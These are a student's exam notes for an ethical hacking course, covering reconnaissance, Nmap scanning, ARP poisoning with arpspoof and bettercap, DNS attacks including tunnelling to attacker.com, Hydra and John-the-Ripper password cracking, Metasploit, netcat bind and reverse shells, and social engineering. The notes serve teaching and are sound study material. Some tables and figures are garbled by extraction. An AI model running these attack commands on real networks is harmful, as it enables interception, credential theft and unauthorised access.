Uploaded by Tan Tze Wei

CSCI369 - Exam Notes

advertisement
CSCI 369 – Ethical Hacking Exam
Contents
Lecture 1-1: Introduction to Ethical Hacking ............................................................2
Lecture 1-2: Information Gathering ...........................................................................6
Lecture 2-1: TCP/IP Basics and Capturing Traffic .................................................10
Lecture 2-2: Scanning ..............................................................................................15
Lecture 3-1: ARP and ARP Poisoning ....................................................................19
Lecture 3-2: Protection against MITM, DNS Attacks and NAT .............................23
Lecture 4-1: Password Cracking and Password Security ........................................28
Lecture 4-2: Vulnerability Scanning & Target Exploitation (1) .............................32
Lecture 5-1: Target Exploitation (2) and Social Engineering .................................37
Lecture 5-2: Web Penetration ..................................................................................42
Lecture 6-1: Wireless Network Penetration and Privacy Tools ..............................45
Lecture 6-2: Privacy Tools (2) & Miscellaneous Topics.........................................49
Lecture 1-1: Introduction to Ethical Hacking
Kinds of hackers
White Hat (Ethical Hackers)
• Under owner’s consent, they aim
to identify the vulnerabilities in
the current system.
• They abide by a code of ethics
which states that they cause no
harm.
Grey Hat
• They hack with good intentions
but at times without permission.
Black Hat (Malicious Hackers)
• They lack ethics, violate laws,
and break into computer systems
with malicious intent.
• They might or might not be
motivated by an agenda, but
typically the information they
gather is sold for a price.
Cyberlaw was introduced due to:
➢ The difficulty of existing legal framework to keep up with technological
advances in the cyberspace.
➢ The fact that more crimes take place within cyberspace.
➢ It touches on many elements such as:
➢
Contracts.
➢
Interactions between supplier and consumers.
➢
Policies on handling of data and accessing corporate systems.
➢
Complying with government regulations and programs.
Controversies in Cyberlaw
• FISA (Foreign Intelligence Surveillance Act of 1978)
➢ It is a United States federal law which permits the government to
conduct electronic surveillance on “agents of foreign powers”
suspected of espionage or terrorism. (If one of the parties involved in
the communication is a US citizen, the law can be applied.)
➢ Wiretapping could be performed with or without a court order to
acquire foreign intelligence.
Categories of cybercrime law
Identity theft
• Where personal information
is stolen and used, mainly for
financial gain.
• E.g., Opening of credit
card/bank account, obtaining
rental properties.
Theft of service
• Use of phone, Internet (Wi-Fi
Network intrusion (Wi-Fi network)
service), streaming movies
without permission, it usually
involves password cracking.
• E.g., Sharing a Netflix
account with friends can be
considered as theft and can be
prosecuted in certain states of
US
Transmitting of illegal materials
• Distribution of pirated
(without permission/license)
software, games, movies, or
child pornography.
• E.g., Pirate Bay, Megaupload
Cyberextortion/Ransomware attacks
• Demanding money to prevent
a threatened attack/leak of
company’s confidential
information
• E.g., Fitness brand Garmin
was a victim of a ransomware
attack on 27 July 2020, their
wearables, apps, websites,
and call centers are offline for
several days.
• Famous celebrity hack
September 2014, iCloud and
Gmail accounts of celebrities
are broken into, private
photos and videos of
celebrities are leaked to the
public.
Cryptojacking
Dumpster Diving
DoS/DDoS
• Unauthorized use of someone
else’s device to mine
cryptocurrency.
• Gathering of information
from discarded/unattended
materials
• Overloading of system’s
resources so that it cannot
provide the required services
to legitimate users.
Cyberterrorism
Cyberstalking/Cyberbullying
Types of penetration testing
Black-Box
• Most closely resembles an
outside attack. (External
attack)
• Pen tester conducts the attack
from a remote location.
• Pen tester is given extremely
limited information of the
target.
Grey-Box
• Pen tester will be given some
limited knowledge on the
target.
• E.g., what OS is the target
using etc.
White-Box
• Pen tester will be given full
knowledge of the target.
• It stimulates an “insider
attack/internal test”
Pen tester must obtain clear and unambiguous permission from the owners
to perform a pen test.
Preferably a written form of authorization rather than a verbal
authorization:
➢ Systems to be evaluated
➢ Perceived risks
➢ Timeframe
➢ Actions to be performed when a serious problem is found
➢ Deliverables
Risk Mitigation Plan (RMP)
➢ Purpose: It is to develop options and actions to enhance opportunities
and reduce threats in an organization.
➢ Contents: It should clearly document all the actions that took place,
including the results, interpretations, and recommendations.
CIA triad
➢ Confidentiality: Keep information secret/private from those who are
not authorized.
➢ Integrity: Keep information in a format that retains its original
purpose and meaning.
➢ Availability: Keep information and resources available to those
legitimate.
Anti-CIA triad
➢ Improper disclosure/Disclosure: Accidental or malicious revealing
of information.
➢ Unauthorized alteration/Destruction: Accidental or malicious
modification of information.
➢ Disruption: Accidental or malicious disturbance of information or
resources.
Lecture 1-2: Information Gathering
• Information gathering is a process of ethical hacking through which a pen
tester locates information about a target, which will be useful for later steps
of the attack.
Passive
Active
Methods for intelligence gathering
Gathering of information
Tools such as
without establishing contact theHarvester can
between the attacker and
be used to collect
the target.
emails about
targeted domains.
Gathering of information
Tools such as
which involves contact
nmap can be used
between the attacker and
to run scans on
the target.
target machines to
see what ports are
open on them and
thus what
applications are
running on them.
Another example of passive intelligence gathering will be: Open Source
Intelligence (OSINT) gathering:
• By gathering information from publicly available sources such as via
social media, phone number and email research, wireless network
detection and packet analysis.
• Due to the prevalence of online activities, this may be all that is
required to give the attacker everything they need to successfully
profile an organization or an individual.
Domain Name System (DNS)
• It is the phonebook of the Internet.
• It resolves hostnames/domain names to IP addresses so that browsers
can load the necessary Internet resources.
Hierarchy placement
From top to bottom
How does DNS work?
1. User Web Browser - The user will type in an URL into their
browser, but if the browser can’t find the IP address in its own
cache memory, it will send a query to the Local DNS Server
(ISP).
2. Local DNS Server/DNS Resolver – It will check its own cache
memory to find an IP address to match the URL entered into the
browser. If it can’t find it, it will send a query to the Root Server.
3. Root Server – The Local DNS Server queries the Root Servers to
get a list of IP addresses for TLD Servers responsible for .com
4. Top-Level Domain (TLD) Server – The Local DNS Server queries
the TLD Servers to get the IP address of the Authoritative DNS
Server for the URL entered.
5. Authoritative DNS Server – The Local DNS Server queries the
Authoritative DNS Server to get the IP address of the URL
entered.
6. Back to user’s computer - The Local DNS Server will tell the
user’s computer the IP address of the URL entered, and the
computer can now retrieve the URL’s webpage.
Gathering information about subdomains
1. https://searchdns.netcraft.com/
2. https://pentest-tools.com/information-gathering/find-subdomains-ofdomain
Gathering information about domains sharing the same IP address
➢ Reverse IP lookup - https://hackertarget.com/reverse-ip-lookup/
Gathering intelligence from websites
•
•
•
•
•
•
People (personnel)
Email addresses
Physical addresses
Job postings leaking information
Product, project, and service information
Electronic dumpster diving – finding websites that do not exist
anymore (web.archive.org), on Kali Linux we can use “$sudo wget m <website name>” to download the website and view it offline to
allow the attackers to find vulnerabilities.
Intelligence Gathering Tools
➢ nslookup – Gathering information about Domain
➢ A tool for querying the DNS to obtain domain name, IP address
mapping, or other DNS records.
➢ It can send a DNS query directly to any type of DNS Server
(Root, TLD, Authoritative).
➢ By adding the -type option, one can specify the type of DNS
record:
o -type=A (IPv4) or AAAA (IPv6) – Stores IP address for
a name.
o -type= CNAME – This is an alias record for another
record.
o -type=MX – This identifies the mail server for that
domain.
o -type=NS – This identifies authoritative DNS servers for
that DNS name.
o -type=SOA – This provides the authoritative information
about the domain. (e-mail address of the domain admin,
the domain serial number, etc..)
➢ whois – Gathering information about Domain
➢ A protocol for querying about the owner of a domain name, IP
network.
➢ Contains information about the owner, including email
addresses, contact numbers, street addresses, etc..
➢ Command syntax: $ whois <ip address/website url>
➢ traceroute – Gathering information about Network Topology
➢ A tool that can help determine network topology, showing the
packet takes as it travels from the source to its destination.
More importantly, it gives information about routers between
the source and destination.
➢ theHarvester – Gathering information about email addresses, people
➢ A tool to collect email addresses, subdomains, employee
names, etc..
➢ Command syntax: $ theHarvester -d <domain name> -b
<search engine> -l <number of entries>
Lecture 2-1: TCP/IP Basics and Capturing Traffic
TCP/IP Stack
➢ It stands for Transmission Control Protocol/Internet Protocol
➢ TCP/IP stack is specifically designed as a model to offer highly reliable and
end-to-end byte stream over an unreliable internetwork.
TCP: Connection-oriented protocol
➢ The sender does not send any data to the destination until the destination
node acknowledges that it is listening to the sender.
➢ TCP/IP utilizes a three-way handshake to establish a connection between a
device and a server:
o The sender sends a SYN packet to the receiver.
Three-way
o The receiver sends SYN-ACK to the sender.
handshake
o The sender sends ACK to the receiver.
.
o Both the device and server must synchronize and acknowledge
packets before communication begins, then they can negotiate,
separate and transfer TCP socket connections.
UDP: Connectionless protocol
➢ It does not need to verify whether the receiver is listening or ready to accept
the packets unlike TCP which has handshaking dialogues.
➢ Since UDP does not have any handshaking dialogues, there is no guarantee
of delivery, ordering and/or duplicate protection.
➢ Unreliable but fast – Used in applications in which queries must be fast and
only consist of a single request such as DNS, SNMP and DHCP.
IP address classes
➢ Class A address – network.host.host.host
o The first 8 bits (first octet) is to identify the network, and the
remaining 24 bits for the host into that network.
o The 1st byte is reserved for the network address (network prefix) and
the last 3 bytes are assigned to host computers.
o Leading bits: 0
Range
Binary:
00000000. 00000000. 00000000. 00000000
to
01111111. 11111111. 11111111. 11111111
Decimal:
0.0.0.0
to
127.255.255.255
o Number of addresses available for networks: 27 = 127
o Number of addresses available for hosts: 224 = 16,777,216
➢ Class B address – network.network.host.host
o The first 2 bytes are reserved for the network address and the last 2
bytes are assigned to host computers.
o Leading bits: 10
Range
Binary:
10000000. 00000000. 00000000. 00000000
to
10111111. 11111111. 11111111. 11111111
Decimal:
128.0.0.0
to
191.255.255.255
o Number of addresses available for networks: 26+8 = 16,384
o Number of addresses available for hosts: 216 = 64,536
➢ Class C address – network.network.network.host
o The first 3 bytes are reserved for the network address and the last one
byte is assigned to host computers.
o Leading bits: 110
Range
Binary:
11000000. 00000000. 00000000. 00000000
to
11011111. 11111111. 11111111. 11111111
Decimal:
192.0.0.0
to
223.255.255.255
o Number of addresses available for networks: 25+8+8 = 2,097,152
o Number of addresses available for hosts: 28 = 256
➢ Class D for multicast
➢ Class E for R&D and study
Subnet mask - https://www.calculator.net/ip-subnet-calculator.html
➢ A bitmask that yields the network prefix (network address) when applied by a
bitwise AND operation with any IP address in the network.
➢ It is a bitwise
➢ Example – The network prefix of an IP address 192.168.54.3 with a subnet
mask 255.255.255.0 is 192.168.54
➢ Subnet mask for:
▪ Class A – 255.0.0.0
▪ Class B – 255.255.0.0
▪ Class C – 255.255.255.0
IPv4 vs IPv6
No. of bits on IP
Address
Format
Capable of address
How to ping
IPv4
32
Ipv6
128
Decimal
(2 )4.3 billion
Ping xxx.xxx.xxx.xxx
Hexadecimal
(2 )Infinite number
ping6
32
128
Advantages of IPv6 over IPv4:
➢
➢
➢
➢
IPv6 simplified the router’s task compared to IPv4.
IPv6 is more compatible to mobile networks than IPv4.
IPv6 allows for bigger payloads than what is allowed in IPv4.
IPv6 is used by less than 1% of the networks, while IPv4 is still in use by the
remaining 99%.
CIDR Notation
➢ It is the compact method for representing an IP address and its associated
network prefix.
➢ It is constructed from an IP address, a slash (‘/’) then a decimal number. The
decimal number is the count of leading 1 bits in the subnet mask.
➢ Why is it needed? The classful network does not fully represent more finegrained network prefixes.:
o Class A: /8
o Class B: /16
o Class C: /24
Capturing traffic using Wireshark
• It is a GUI software that captures packets in real time and displays them in
human-readable format.
• Interfaces can be selected (such as eth0) and start capturing packets on that
interface.
• By default, Wireshark runs in promiscuous mode. The user can see all the
other packets on the network instead of only packets addressed to the user’s
network adapter.
Wireshark Color Coding
TCP traffic
UDP traffic
Errors
Purple
Light blue
Black
• The user can also see the full TCP conversation between the client and the
server by following the TCP stream.
• Wireshark can capture usernames and passwords entered to insecure
websites.
• Users can capture packets in Wireshark and save it to a “pcap” file, using a
Python Scapy library to look for keywords such as “password” to look for
the password.
• Wireshark is also able to analyze connections based on secure application
protocol such as SSL.
Lecture 2-2: Scanning
➢ Attackers do scan to discover which machines in the target system are live,
as they are unable to perform attacks if any of the machines are not
available.
➢ During the scan, it gives the attacker more specific and precise information
that can lead to exploitation.
Scan types
Ping sweep
Port scanning
Vulnerability
scanning
Description
To find out live
systems (Which IP
addresses have a
system that is live)
Targets a specific IP
address and identifies
the ports that are
open and closed. (A
common technique to
discover weak points
in a network)
To find weaknesses
or problems in an
environment and
generate a report on
its findings.
Base
Protocol
ICMP
scanning.
Tools used
ping –
Targets one
specific IP
Every host
that receives fping – Ping
an ICMP
multiple IP
echo requests addresses.
should
respond,
however,
quite a few
networks and
hosts block
ICMP echo
request to
prevent
scanning.
Nmap
Port-Scanning Tools – Nmap
It has many features such as: port scanning, version detection, OS detection,
network traceroute, multiple ping scanning and scripting functionality.
➢ Command syntax: nmap <option> -v <target IP address>
➢ If the port is closed, the server will send RST (reset/tear down the
connection) back to the client.
Nmap scanning options:
-sT (TCP Scan)
➢ Full Open Scan (Three-way
handshake)
➢ Most reliable way in telling if the
host’s port is open.
➢ It is “noisy” as it creates more traffic
and involves multiple scanning
attempts, which can be detected.
-sS (SYN Scan)
➢ Half open scan (Default option for
Nmap)
➢ Most frequently used scanning
method.
➢ Less likely to trigger detection
mechanism of the target(server).
-sX (Xmas Scan)
➢ It sends a packet of PSH, FIN, URG
flag to create confusion, if the server
does not respond, it means the port is
open or filtered.
-sN (NULL Scan)
➢ It sends a packet with no flag, if the
server does not respond, it means the
port is open or filtered.
-sF (FIN Scan)
➢ It sends a packet with FIN flag, if the
server does not respond, it means the
port is open or filtered.
-sA (ACK Scan)
➢ It sends a packet with ACK flag, if the
server does not respond, it means
filtering is present.
➢ sU (UDP scan) – It is the only Nmap scanning method that identifies
UDP ports.
Nmap port specification:
➢ Default option – Most common 1000 ports will be scanned in a random
order.
➢ -p (port range) – Scan only the defined ports (Can see which ports are
open)
➢ -r – Do not randomize port numbers
➢ -sV – Attempts to determine the version of the service running on port
(version number of the programs the target server is running)
➢ -O – Remote OS detection using TCP/IP stack fingerprinting
➢ -F – Only scan the 100 most common ports (fast)
➢ --top-ports N – Scan the most common N ports
Nmap 6 states:
➢ open – The application is accepting TCP/UDP connection, result of a
TCP or SYN scan.
➢ Closed – There is no application accepting TCP/UDP connection, result
of a TCP, SYN, Xmas, NULL, FIN scan.
➢ Filtered – There is a packet filtering mechanism blocking the probe,
result of an ACK scan.
➢ Unfiltered – The port is accessible, however Nmap is unable to determine
if the port is open or not, result of an ACK scan.
➢ Open|filtered – The port is open or filtered, however Nmap is unable to
determine if the port is open or filtered, result of a Xmas, NULL, FIN
scan.
➢ Closed|filtered → Uncommon
Lecture 3-1: ARP and ARP Poisoning
ARP (Address Resolution Protocol)
➢ It is a network protocol used to discover the hardware (MAC) address of a
host from an IP address.
➢ It is used on Ethernet LANs when host want to communicate with each
other, and they should know each other’s MAC address.
➢ It is a simple request-reply protocol:
o ARP request message are used to request for the MAC address
o ARP reply message are used to send the requested MAC address
➢ ARP requests cannot be blocked by the host’s local firewall as ARP request
are not routed on a network.
1
3
2
4
netdiscover
➢ It can be used to discover the connected clients to the current network
interface.
➢ It shows information such as: IP address, MAC address and the hardware
manufactures of the clients’ network card.
➢ It runs on 2 modes:
o Passive mode – It sniffs arp requests on the network, but it does not
generate any packet on the network.
o Active mode – It finds nodes by sending arp requests.
ARP Poisoning (based on MITM attack)
➢ Man-In-The-Middle attack is an attack where the attacker secretly
relays and possibly modifies the communication between two parties,
making them believe they are directly communicating with each other,
the attacker will be in the “middle” to intercept the messages between the
two parties.
1
2
3
4
5
6
➢ Essentially the attacker wants Host A to think that he is the gateway and
wants the real gateway to think that he is Host A.
(“Impersonation”/Redirecting traffic)
➢ The attacker will be able to intercept every packet that goes through
between Host A and the real gateway.
➢ The attacker will then be able to read/modify/drop these packets in the
traffic, which will allow the attacker to conduct more powerful attacks.
Arpspoof
➢ It is a tool to perform ARP Poisoning attack.
1. On target machine, run “arp-a” to check the MAC address of Kali
Linux and the gateway.
2. On Kali, run “arpspoof -i <interface> -t <target IP> <gateway IP>
3. On Kali, run “arpspoof -i <interface> -t <gateway IP> <target IP>
4. On Kali, run “echo 1 > /proc/sys/net/ipv4/ip_forward”. This will
enable IP forward to make packets go through the attacker’s
device.
Notice the gateway’s MAC address changed to Kali’s MAC address.
ARP Poisoning is successful.
Bettercap
➢ It is another method to perform ARP poisoning attack on Kali Linux. It
features a GUI, more user friendly.
1. On Kali, run “set arp.spoof.fullduplex true”. This will let Kali
attack both the targets and the gateway.
2. On Kali, run “set arp.spoof.targets <target IP>” and “arp.spoof
on”.
3. Now, the target machine will think Kali is the gateway.
4. On Kali, run “net.sniff on”, Kali will now be able to capture
sensitive information. If the target visits an unsecured website and
keys in their login credentials, Bettercap will be able to capture
that information.
➢ We can also write scripts to better execute the commands in Bettercap,
the file extension will be “.cap”
➢ We can also perform SSL stripping, which downgrades a https website to
http one, this will ensure https does not use TLS(SSL) encrypt normal
HTTP requests and responses, thus allowing them to see everything the
user says in an unencrypted form.
Prevention against ARP Poisoning
➢ It is difficult to prevent ARP poisoning itself, as it exploits the insecure
way that ARP works. (Why ARP Poisoning works)
➢ Prevention methods such as using static ARP tables are not feasible as it
is does not scale well and have to be configured every time a new device
is connected to the network.
➢ Detection methods:
o Looking at the current ARP table (arp -a) – If the MAC address of
the gateway changes, that means ARP Poisoning is underway.
o Tools that monitor the ARP automatically – If there is anything
suspicious, it will send the user a notification.
o Wireshark – It warns the user by the message (“duplicate use of
<IP address> detected”>
Lecture 3-2: Protection against MITM, DNS Attacks and NAT
End-to-end encryption can be an effective solution against eavesdropping using
MITM attack:
➢ The end-to-end encryption successfully prevents the adversary from
accessing the data in the middle.
➢ Even if the attacker managed to capture all the data transmitted between the
server and the target, he is still unable to decrypt the data.
➢ The most popular and common end-to-end encryption will be TLS/SSL
encryption, which solves HTTP’s problem as requests and responses are sent
in plaintext.
SSL/TLS Strip
➢ Since most websites uses TLS/SSL encryption (https), it makes it almost
impossible to catch usernames and passwords. This is where SSL stripping
comes in, the idea is to downgrade a https site to http.
➢ By downgrading https to http, the attacker prevents SSL certificate errors
while he communicates with the client.
How to prevent SSL Strip?
o Users should do their due diligence in checking if the website they are
visiting is a https site (check the SSL certificate on the website before
they key in any sensitive information)
o HSTS (HTTP Strict Transport Security) – A policy that enforces a
web browser to only interact with websites using https. (The browser
will not open a page unless the traffic from the websites is not https.)
Recap: Domain Name System (DNS)
➢ Phone book of the Internet, it translates domain names to IP addresses so
that web browsers can load Internet resources. (All Internet working
applications require DNS to function)
➢ Uses a hierarchical naming schema, Root Server → Top-Level Domain
Server → Authoritative Server
➢ Traditional firewalls leave port 53 open for DNS queries; however, this is
difficult to protect against DDoS attacks such as amplification and
reflection, therefore, it becomes a primary target to slow down or disable the
target network.
Normally if a DNS server does not
know a requested translation, it will
proceed to ask another DNS server,
and this process continues
recursively.
To increase performance, a DNS
server will store these translations
in the cache for a certain amount of
time, so that if it receives another
requestion for the same translation,
it will be able to reply without
needing to ask other DNS servers.
DNS Attacks
1. DNS Cache Poisoning (DNS Spoofing)
• The attacker breaks into a local DNS server and modifies the
DNS cache, so that it can return an incorrect IP address,
redirecting traffic to another computer.
• This means the DNS cache has been poisoned, since the cache
gives the victim a false translation of hostnames.
• Example – This attack can redirect users from a website to a
one that the attacker owns.
o Attacker spoofs the IP address/DNS entries for a target
website on a given DNS server and replaces them with
the IP address of a server under their control.
o Usually, the server under the attacker’s control has been
infected with malware.
o This technique can also be used for phishing attacks,
where a fake version of a genuine website is created to
collect personal details (bank and credit card details)
2. DNS Spoofing with MITM
• The MITM attacker captures a DNS response from the DNS
server and replaces it with a modified one so that the DNS
response will result in forcing the victim to visit the attacker’s
server.
ARP Poisoning
Combination of
DNS spoofing +
MITM
3. Domain Hijacking
• Attacker gains access to domain registration service (such as
GoDaddy.com)’s server. (GoDaddy.com offers free whois
privacy, which replaces the user’s information in the WHOIS
with the information of a forwarding service)
• It is difficult to attack those servers, but if it happens, there will
be severe consequences.
The attacker will change the
IP address of a target website
with the attacker’s IP of
choice.
All the other DNS servers will
be updated with the new
information.
4. DNS Tunnelling
• An attacker’s malware in the victim’s machine wants to transfer
data from it to the attacker’s server. (If the attacker uses File
Transfer Protocol (FTP), it will be detected by the victim’s
firewall)
• The attacker acquires some domain such as attacker.com and
runs local DNS server.
• The malware in the victim’s machine makes DNS queries of the
form <data>.attacker.com, where <data> is the data the attacker
wants to exfiltrate.
• If the query reaches the attacker’s DNS server, the DNS
response will be sent to the victim’s machine. And since the
DNS query is going through port 53, it is legitimate, enabling
the attacker’s malware to bypass the firewall.
5. DNS flood attack (DDoS attack related)
A form of DDoS attack.
Attacker targets one or more DNS servers
belonging to a given zone, attempting to
impede resolution of resource records of
that zone and its sub-zones.
The objective of the attacks is to exhaust
server-side assets with a flood of UDP
requests, generated by scripts running on
several compromised botnet machines.
6. DNS amplification attack
• The attacker obtains a victim’s IP address.
• The attacker identifies a website with large number of DNS
records.
• The attacker crafts fake DNS queries for the host with a large
amount of DNS data with the victim’s IP (as a receiver) so that
DNS responses with the large number of DNS records are
returned to the victim.
• The victim’s machine cannot handle the large amount of DNS
responses → The machine is down.
Lecture 4-1: Password Cracking and Password Security
Password cracking
➢ It is an effective way to gain access to a system.
➢ Many institutions urge and educate their members to select strong passwords
but not everyone follows the rule, always almost weak passwords are used.
Password cracking methods:
1. Brute-force attack
• Every possible combination of characters is attempted until the
correct one is discovered.
• Although this attack has potential to be successful eventually,
many modern systems employ techniques such as “account
lockouts” or “bad login counts” to prevent this attack. (Such as
iPhone’s passcode, if too many failed login attempts, the phone
will not allow the user to unlock for the phone for a certain
amount of time)
2. Dictionary
• Uses a list of words which can possibly be used as passwords.
• Passwords cracking software usually has pre-loaded lists of
words or allow users to load their own list (text file).
• The words on the list can accelerate the cracking process and
time.
• These lists are all over the Internet and can be downloaded for
free.
3. Hybrid method
• This attack uses the dictionary attack as a basis but adopts some
techniques of brute-force attacks as part of the process. (It can
attempt some words in the dictionary but add numbers or
special characters in a brute-force way)
Password cracking tool
1. Hydra (Brute force)
• It is an online brute-force password attack tool.
• It makes use of numerous protocols including ftp, http, ssh,
smtp, POP3, mysql and etc.
• It supports multiple connection (i.e., parallel attacks)
• Command syntax: hydra [options] <target IP> <protocol>
o -t (The number of connects in parallel per target, default
is 16)
o -l (The login ID of the target)
o -P (Load several passwords saved in the file)
o -v (verbose)
o -V (Shows every password being tried)
2. John-the-Ripper (Hybrid method in password cracking)
• Unlike Hydra, it is an offline attack that finds the target’s
password.
• It usually uses a password list, but it is capable of performing a
brute-force attack.
• The attack consists of 2 steps:
o Combine /etc/passwd(Stores a list of registered users in
the system) and /etc/shadow(Stores the hashes of the
passwords) – This process is called unshadowing.
o Performing a dictionary attack against the unshadowered
file using a word list to find a password.
Rainbow table
➢ It is a table of reversed hashes used to crack password hashes.
➢ It greatly speeds up many types of password cracking attacks, often taking
minutes to crack where other methods (such as dictionary, brute-force
attack) may take much longer.
➢ It is a well-known pre-computed table for reversing hash. A table look-up is
much faster than computing hash values one by one (This technique is called
time/memory trade off).
➢ The basic idea is to search p such that h = H(p) using a huge number of precomputed (p, h)’s.
Salt for password hashing
➢ It is a cryptographic salt is made up of random bits added to each password
instance before its hashing.
➢ Salt creates unique passwords even in the instance of two users choosing the
same passwords.
➢ It helps us mitigate hash table attacks by forcing attackers to re-compute
them using salts for each other.
➢ Benefits of using “salt” for password hashing
o Since salt creates unique passwords, it reduces the possibility of
collision.
o It enlarges the input space of the hash function, so the size of the
rainbow table will be larger, making rainbow table attack impossible.
Password entropy H
➢ It is the measure of strength of a password in bits.
➢ Formula:
o H = log2NL (where L is the length of a string, password and N is the
number of possible symbols)
o It can be easily derived that L = H/log2N
➢ The minimum number of bits of entropy needed for a password depends on
the threat model for the given application:
o If online attacks are expected – 20-bit entropy is needed.
o Important cryptographic keys to be secure for a long period of
time – 96-bit entropy is needed.
o Where does this estimation come from – n-bit entropy = Find a
random (uniform) n-bit key
Guidelines for strong passwords
➢ Should:
o Minimum password length of 8 or more characters if permitted.
o Passwords should include lowercase and uppercase alphabetic
characters, numbers and symbols if permitted.
o Generate passwords randomly where feasible.
o Write down a password on a paper and store it (argumentative)
o Password manager – To generate and retrieve complex passwords in
an encrypted database.
➢ Avoid:
o Same passwords across multiple accounts.
o Repetition of characters, keyboard patterns, dictionary words, letter,
or number sequences – qwerty123
o Public information that can be found online: birthdays, favorite sport
teams, telephone numbers, usernames, relative or pet names, romantic
links, or biographical information(addresses/birthplace).
o Using default passwords supplied by the system vendor as lists of
default passwords are widely available on the Internet.
o Using dictionary words with numbers appended/dictionary words:
john1234, mustang
o Words with simple obfuscation: p@ssword, @dm1n
Lecture 4-2: Vulnerability Scanning & Target Exploitation (1)
Vulnerability Scanning
➢ Concept – A process of identifying and analyzing the critical security flaws
in the target system.
➢ Purpose – It is an automated high-level test conducted that looks for
potential security vulnerabilities on the target system.
➢ Benefits – It can provide valuable information about the security posture of
an organization’s infrastructure, technical and management policies.
Types of vulnerabilities:
1. Design
• Weaknesses in the software specifications. (Worst type)
• To fix these, the changes must be introduced into the security
requirements. However, subsequent changes to the design and
implementation can take considerable time and effort.
2. Implementation
• Technical security glitches found in the code of the system.
3. Local
• Attacker will require local access in order to exploit the
vulnerability; this is used where the attacker already has the
ability to execute code with limited permission and wishes to
enhance his privileges to gain unrestricted access (privilege
escalation)
4. Remote
• Attacker has no prior access to the system but is able to trigger
the execution of a piece of code over the network; this type
allows an attacker to gain access to the system without having
to deal with physical or local contacts.
5. Operational
• Improper configuration and deployment of a system in a
particular environment.
Vulnerability taxonomy
1. Common Weaknesses Enumeration (CWE)
• It is a list of software and hardware weaknesses. (It is organized
following three categories – “Research Concepts”,
“Development Concepts” and “Architectural Concepts”.
• It has to do with the vulnerability – not the instance within a
product or system.
• It is supported by MITRE.
• Purpose:
i. To facilitate the effective use of tools that can identify,
find and resolve bugs, vulnerabilities and exposures in
computer software before the programs are publicly
distributed or sold.
• Benefits:
i. Consumers – They can have assurance that the software
they purchased has been reviewed for known types of
security flaws.
ii. Developers – They can describe their capabilities in
terms of the standard CWEs.
2. Common Vulnerability and Exposures (CVE)
• It is a list of publicly disclosed computer security flaws. Every
security flaw is assigned to a CVE ID number.
• It has to do with the specific instance within a product or
system – not the underlying flaw.
• It is supported by US-CERT, US Homeland Security
Department, MITRE and development centers sponsored by the
U.S. federal government.
• Definitions given in CVE:
i. Vulnerability: The state of being exposed to an attacker
who can maliciously gain full access to a network or
system.
ii. Exposure: A mistake in the software code or
configuration that provides an attacker with indirect
access to a network or system.
• Purpose of CVE:
i. To standardize the way each known vulnerability and/or
exposure is identified so that CVE database is
maintained.
ii. Standard IDs provides security administrators with quick
access to technical information about a specific threat
across multiple CVE-compatible information sources.
3. Open Web Application Security Project (OWASP)
It is a standard awareness
document for developers and
web application security.
It represents a broad
agreement about the most
critical security risk to web
applications.
Target Exploitation
➢ It is the next step after all the information gathering and scanning.
➢ This process will be simple if the attacker has obtained valuable information.
➢ Types of exploitation:
i. Attack on client
▪ Getting the IP of the target will be tricky if the target is a
personal computer if the target’s router assigns local (private)
IPs to connected devices as the IP that is visible may be the
router’s IP address.
▪ Client side attacks are more effective if reverse connection can
be used.
ii. Attack on servers
▪ Need to obtain IP address of the target server.
▪ Attacks become simpler if the target is on the same network.
▪ Tools such as:
• nmap
o To gather information about the target server’s OS
($ nmap -O <Target IP>) (
o To gather information about the target server’s
version number of programs that target server is
running ($nmap -sV <Target IP>)
• netcat
o To connect to the target machine on a specific port
($ nc <Target IP> <Port no.>)
o We can perform many actions such as file transfer
using netcat (requires shell)
Metasploit Modules
➢ It is a piece of software that the Metasploit Framework uses to perform a
task, such as exploiting or scanning a target.
Module Types
It is a program that takes advantage of a
Exploit
specific vulnerability and provides
attackers access to the target system.
Payload
Typically, it carries a payload and delivers
to the target.
It is the actual code that executes on the
target system after an exploit successfully
executes.
It can be a reverse shell payload or a bind
shell payload. A backdoor.
Auxiliary
It does not require a payload,
mainly used for information
gathering such as a scanner.
Basic commands of Metasploit
msfconsole
Run the Metasploit console in Kali
Linux
help
Show instructions
search <keyword>
Look for possible exploits containing
the keyword.
use
Use a specific exploit, payload or
auxiliary.
show options
Display options for the current
modules.
set <option> <value>
Configure <option> to have a value
of <value>
run
Execute auxiliary modules.
exploit
Start exploit modules.
back
Go back to the original console
prompt.
clear
Clear the screen.
exit
Exit from Metasploit.
Lecture 5-1: Target Exploitation (2) and Social Engineering
Payloads in Metasploit
3 types of payloads
Payloads that are self-contained and
standalone. (They do not depend on other
programs to run)
Small programs that establish and maintain
communication between the attacker and
victim.
Payload components that are downloaded by
the Stagers (usually big)
Single(s)
Stager(s)
Stage(s)
Shell
➢ It is a program that acts as a link between the user and the kernel. (Bash
shell, cmd.exe, etc)
➢ Hacker’s POV – It is a command-line interface (CLI) that provides the
hacker access to a remote target.
BIND
REVERSE
Bind shell vs Reverse shell
Bind shell
Shell provided to the attacker when:
Usually resulted from:
How to create:
Useful when:
Reverse shell
Attacker connects to the target.
Server-side attack
On the target machine:
“$ nc -nvlp <Port number>”
Victim connects to the attacker.
Client-side attack
On the attacker’s machine:
“$nc -nvlp <Port Number>”
On the attacker’s machine:
“$nc <Target IP> <Port Number>”
On the target machine:
“$nc <Target IP> <Port Number>”
Victim machine will listen to a
specific port number while the
attacker machine will connect to it.
Attacker machine will listen to a
specific port number while the
victim machine will connect to it.
Firewalls are present to block
suspicious traffic as bind shells
cannot be created.
The target is behind a private
network.
Stealthy and effective attack.
Client side exploitation
➢ Meterpreter shell from Metasploit
➢ Trojan (Similar to Assignment’s freesweep software)
o They are programs which are supposed to do something which the
users want but actually perform another, malicious act.
o Capabilities
▪ Key-logger
▪ Adding the victim’s system to a botnet
▪ Giving the attacker full access to the victim’s machine
(Backdoor)
▪ File transfer
o Spreading – As trojans cannot be spread themselves, they rely on
some social engineering tactics (email, website, CD, SMS).
o Hiding – Difficult due to user-awareness and effective anti-virus
software.
Social Engineering
➢ It uses a broad range of malicious activities to psychologically manipulation
to trick users into making security mistakes or giving away sensitive
information.
➢ Importance – Since humans are the weakest link in cybersecurity, we are
easily manipulated by others to do their bidding, making us vulnerable to
social engineering information gathering and attacks.
➢ Attack process:
1. Information gathering
▪ It will be conducted via OSINT gathering via the Internet (or
social networks), obtaining valuable information about the
targeted individual or organization.
▪ Better insight about the target can be obtained by engaging the
target physically involved in corporate events and parties or
conferences.
2. Identifying vulnerable individuals
